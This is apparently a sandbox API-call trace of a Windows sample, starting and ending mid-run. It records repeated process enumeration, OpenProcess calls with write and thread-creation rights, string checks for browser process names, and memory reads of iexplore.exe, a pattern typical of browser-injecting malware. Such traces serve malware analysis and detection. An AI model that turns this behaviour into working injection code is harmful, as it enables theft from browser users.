	[0230.609] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0230.610] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x6880
	[0230.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.610] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0230.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.610] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0230.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.610] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0230.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.611] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.611] NtQueryInformationProcess (in: ProcessHandle=0x6880, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0230.611] ReadProcessMemory (in: hProcess=0x6880, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0230.611] ReadProcessMemory (in: hProcess=0x6880, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0230.611] ReadProcessMemory (in: hProcess=0x6880, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0230.611] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0230.611] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0230.612] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x6884
	[0230.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.612] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0230.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.613] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.613] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0230.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.613] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.613] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0230.614] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x6888
	[0230.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.614] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0230.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.615] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.615] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0230.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.616] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.616] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.616] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x688c
	[0230.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.617] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.617] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.617] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.618] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.618] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.619] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.619] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x6890
	[0230.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.619] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.620] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.620] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.621] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.621] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.622] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x6894
	[0230.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.622] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.622] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.622] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.623] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.623] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0230.624] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x6898
	[0230.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.624] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0230.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.624] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.624] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0230.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.625] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.625] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0230.626] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x689c
	[0230.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.626] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.626] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.627] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.627] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.627] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.628] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x68a0
	[0230.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.628] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.628] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.629] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.629] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.629] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.630] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x68a4
	[0230.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.630] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.630] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.631] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.631] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.631] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0230.632] CloseHandle (hObject=0x4fd0) returned 1
	[0230.632] Sleep (dwMilliseconds=0x64) 
	[0230.742] GetCurrentProcessId () returned 0x110
	[0230.742] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0230.746] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0230.748] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0230.750] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0230.752] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x68a8
	[0230.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.752] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0230.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.753] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.753] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0230.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.754] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.754] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0230.754] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x68ac
	[0230.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.755] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0230.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.755] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.755] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0230.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.755] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.756] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0230.757] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x68b0
	[0230.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.757] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0230.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.757] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.758] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0230.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.758] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.758] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0230.759] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x68b4
	[0230.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.759] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0230.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.759] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.760] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0230.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.760] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.760] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0230.761] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x68b8
	[0230.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.761] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0230.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.761] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.762] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0230.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.762] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.762] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0230.763] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x68bc
	[0230.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.763] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0230.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.764] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.764] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0230.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.764] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.764] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0230.765] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x68c0
	[0230.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.765] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0230.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.766] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.766] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0230.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.766] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.766] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0230.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x68c4
	[0230.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.767] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0230.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.768] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.768] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0230.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.768] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.768] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.769] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x68c8
	[0230.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.769] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.770] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.770] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.770] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.771] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.772] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x68cc
	[0230.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.773] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.773] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.773] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.774] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.774] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.774] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x68d0
	[0230.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.775] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.775] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.775] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.776] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.776] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.776] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x68d4
	[0230.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.777] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.777] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.777] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.778] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.778] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.779] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x68d8
	[0230.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.779] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
